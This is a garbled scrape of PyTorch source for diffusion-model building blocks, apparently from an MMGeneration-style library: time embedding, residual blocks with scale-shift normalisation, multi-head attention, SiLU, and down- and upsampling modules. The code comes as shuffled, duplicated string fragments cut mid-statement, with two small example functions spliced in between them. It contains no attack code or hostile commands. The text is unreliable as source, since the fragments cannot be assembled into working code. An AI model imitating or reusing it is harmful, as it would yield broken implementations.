Args: in_channels (int): Number of", "def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift", "\"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3,", "def init_weights(self): # apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module()", "end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args),", "operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after", "layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU',", "@MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average pooling", "dim]`. \"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0,", "embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels)", "torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x)", "last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If", "= build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ]", "x def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map", "`True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels,", "the input feature map to be downsampled. with_conv (bool, optional): Whether apply an", "feed to neural networks. Args: in_channels (int): The channel number of the input", "self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not equals", "in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output))", "x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ <", "None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding", "of channels of the input feature map. embedding_channels (int) Number of channels of", "super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1)", "(int): Channels of the input feature map. num_heads (int, optional): Number of heads", "self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3,", "x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling. 
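

# Illustrative sketch (not part of the original module): the two conditioning
# modes differ only in where the embedding enters (scale/shift after the norm
# vs. addition before it); both preserve the feature map shape. Sizes are
# arbitrary assumptions for the demo.
def _norm_with_embedding_example():
    x = torch.randn(2, 32, 8, 8)
    y = torch.randn(2, 128)
    scale_shift = NormWithEmbedding(32, 128, use_scale_shift=True)
    additive = NormWithEmbedding(32, 128, use_scale_shift=False)
    assert scale_shift(x, y).shape == x.shape
    assert additive(x, y).shape == x.shape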
\"\"\"", "__init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _,", "True, the output of Embedding layer will be split to 'scale' and 'shift'", "1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive", "``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False),", "embedding layer. If `use_scale_shift == True`, embedding results will be chunked and used", "(torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return", "\"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half,", "operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if", "def forward(self, t): \"\"\"Forward function for time embedding layer. Args: t (torch.Tensor): Input", "in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential(", "the output of normalization layer to ``out * (1 + scale) + shift``.", "dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device)", "def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm =", "input feature map to be downsampled. with_conv (bool, optional): Whether use convolution operation", "layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the", "is not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace", "'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to None. act_cfg (dict,", "inplace operation or not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if", "in the denoising network. Allows users to apply an additional convolution layer after", "to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels,", "Channels of the input feature map. num_heads (int, optional): Number of heads in", "class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users to apply", "+ embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising", "= torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function", "to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut conv.", "Whether use convolution operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels,", "norm_cfg (dict, optional): The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``.", "(torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling. 
\"\"\" x", "= torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function for multi", "3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self,", "constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding.", "an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer", "qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1])", "Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return x *", "input embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN',", "`True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv", "-1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h)", "normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU',", "partial import mmcv import numpy as np import torch import torch.nn as nn", "' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1", "Number of heads in the attention. norm_cfg (dict, optional): Config for normalization layer.", "Args: in_channels (int): The channel number of the input feature map. embedding_channels (int):", "optional): The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict,", "= torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q", "self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d(", "else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [", "layer. Args: in_channels (int): Number of channels of the input feature map. embedding_channels", "[embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time", "q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight", "return x + shortcut def init_weights(self): # apply zero init to last conv", "users to apply an additional convolution layer after the nearest interpolation operation. Args:", "x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b *", "self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x):", "\"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x =", "nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature", "(h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time", "out_channels = in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _,", "(torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor : Output feature", "\"\"\"Resblock for the denoising network. 
If `in_channels` not equals to `out_channels`, a learnable", "ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import", "super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not", "after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv:", "if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut =", "dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)],", "dropout (float): Probability of the dropout layers. out_channels (int, optional): Number of output", "(int): The channel number of the output embedding. embedding_mode (str, optional): Embedding mode", "* torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding", "or shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut", "3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel =", "(dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self,", "zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with", "feature map. embedding_channels (int) Number of channels of the input embedding. norm_cfg (dict,", "torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for", "\"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv =", "channel number of the output embedding. embedding_mode (str, optional): Embedding mode for the", "h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c,", "scale) + shift``. Otherwise, the output of Embedding layer will be added with", "Input feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial", "number of the output embedding. embedding_mode (str, optional): Embedding mode for the time", "\\'SiLU\\' is not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace =", "https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock):", "= in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels,", "{embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor):", "of the input feature map. embedding_channels (int) Number of channels of the input", "x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor", "First embedding time by an embedding function, then feed to neural networks. Args:", "= nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. 
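

# Illustrative check (not part of the original module): both variants halve
# the spatial resolution; only the conv variant has learnable weights.
def _downsample_example():
    x = torch.randn(2, 16, 32, 32)
    assert DenoisingDownsample(16, with_conv=True)(x).shape == (2, 16, 16, 16)
    assert DenoisingDownsample(16, with_conv=False)(x).shape == (2, 16, 16, 16)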
Args: x (torch.Tensor):", "nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def", "the dropout layers. out_channels (int, optional): Number of output channels of the ResBlock.", "function for multi head attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor:", "the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for", "mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings", "inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer will be split", "forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x,", "ResBlock. If not defined, the output channels will equal to the `in_channels`. Defaults", "Number of output channels of the ResBlock. If not defined, the output channels", "map after attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b, c,", "passes timestep embeddings to the children that support it as an extra input.", "shape as `[bz, dim]`. \"\"\" half = dim // 2 freqs = torch.exp(", "def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels,", "map to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x,", "3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args: x", "3 q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel))", "forward(self, x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature map to", "out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x", "build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A", "map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial = x.shape", "of output channels of the ResBlock. If not defined, the output channels will", "mmcv import numpy as np import torch import torch.nn as nn import torch.nn.functional", "Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True):", "if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x =", "conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift", "(int): The dimension of the embedding. max_period (int, optional): Controls the minimum frequency", "'1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch", "embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper()", "upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map", "* (1 + scale) + shift else: x = self.norm(x + embedding) return", "* (1 + scale) + shift``. 
Otherwise, the output of Embedding layer will", "args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim", "dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels", "downsampled. with_conv (bool, optional): Whether apply an additional convolution layer after upsampling. Defaults", "nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg)", "< 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function for", "norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict(", "If True, the output of Embedding layer will be split to 'scale' and", "x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average", "dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [", "inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is", "channels of the input feature map. embedding_channels (int): Number of channels of the", "return weight def forward(self, x): \"\"\"Forward function for multi head attention. Args: x", "f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if", "\"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input feature map. Returns:", "build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels,", "scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v)", "= self.norm(x) x = x * (1 + scale) + shift else: x", "timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz, ]``, one per", "torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight =", "The dimension of the embedding. max_period (int, optional): Controls the minimum frequency of", "`False`. 
\"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace", "x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x +", "def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of", "build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ]", "else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward", "half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if", "be added with the input before normalization operation. Defaults to True. \"\"\" def", "2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t):", "input before normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN',", "operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False),", "to Two level embedding. First embedding time by an embedding function, then feed", "batch element. dim (int): The dimension of the embedding. max_period (int, optional): Controls", "channels of the input feature map to be downsampled. with_conv (bool, optional): Whether", "will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config", "for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut:", "< '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An", "= inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input", "0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding. First", "shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding =", "_, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj", "1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation.", "with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1,", "that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self,", "return embedding def forward(self, t): \"\"\"Forward function for time embedding layer. Args: t", "to `out_channels`, a learnable shortcut with conv layers will be added. Args: in_channels", "/ np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight =", "Args: in_channels (int): Number of channels of the input feature map to be", "v) return weight def forward(self, x): \"\"\"Forward function for multi head attention. Args:", "ported from here, but adapted to the N-d case. 
https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args:", "to `None`. norm_cfg (dict, optional): The config for the normalization layers. Defaults too", "' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings.", "if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class", "out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else", "and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels", "= nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x", "not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise", "layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation", "average pooling and convolution for downsample operation. Args: in_channels (int): Number of channels", "= layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU)", "to embedding. 1-D tensor shape as ``[bz, ]``, one per batch element. dim", "to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__()", "size for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels,", "of normalization layer. Args: in_channels (int): Number of channels of the input feature", "DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average pooling and convolution", "if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2)", "for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the", "for upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature", "(dict, optional): Config for time embedding. Defaults to None. act_cfg (dict, optional): Config", "Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used", "EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to the children that support", "x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y)", "layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function,", "will be added. Args: in_channels (int): Number of channels of the input feature", "downsampled. with_conv (bool, optional): Whether use convolution operation for downsampling. 
Defaults to `True`.", "shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def", "will be split to 'scale' and 'shift' and map the output of normalization", "if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding)", "self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for", "input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self:", "Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels,", "``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks", "(int, optional): Number of output channels of the ResBlock. If not defined, the", "dim (int): The dimension of the embedding. max_period (int, optional): Controls the minimum", "3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ],", "the input before normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels,", "def forward(self, x): \"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input", "from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self: if isinstance(layer,", "of the input feature map to be downsampled. with_conv (bool, optional): Whether apply", "build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input", "apply an additional convolution layer after the nearest interpolation operation. Args: in_channels (int):", "weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)", "Otherwise, embedding results will directly add to input of normalization layer. Args: in_channels", "def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__()", "timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2:", "+ shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module):", "Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config", "= torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float()", "OpenMMLab. All rights reserved. from copy import deepcopy from functools import partial import", "+ scale) + shift else: x = self.norm(x + embedding) return x @MODULES.register_module()", "function. Args: input (bool, optional): Use inplace operation or not. Defaults to `False`.", "embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :,", "to be downsampled. 
with_conv (bool, optional): Whether apply an additional convolution layer after", "= dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn", "feature map tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns:", "Number of channels of the input feature map. embedding_channels (int) Number of channels", "defined, the output channels will equal to the `in_channels`. Defaults to `None`. norm_cfg", "shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights()", "activation. \"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace)", "to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the", "output embedding. embedding_mode (str, optional): Embedding mode for the time embedding. Defaults to", "the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for the normalization", "shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling", "num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)", "Args: in_channels (int): Number of channels of the input feature map. embedding_channels (int)", "__init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\'", "__init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels),", "apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization", "= self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut", "the ResBlock. If not defined, the output channels will equal to the `in_channels`.", "map. embedding_channels (int): Number of channels of the input embedding. use_scale_shift_norm (bool): Whether", "noqa Args: in_channels (int): Channels of the input feature map. num_heads (int, optional):", "'1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention", "\"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm", "def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2,", "layer to ``out * (1 + scale) + shift``. Otherwise, the output of", "1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v", "Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x)", "attention block allows spatial position to attend to each other. Originally ported from", "used to re-shift and re-scale normalization results. Otherwise, embedding results will directly add", "operation. Defaults to `dict(type='GN', num_groups=32)`. 
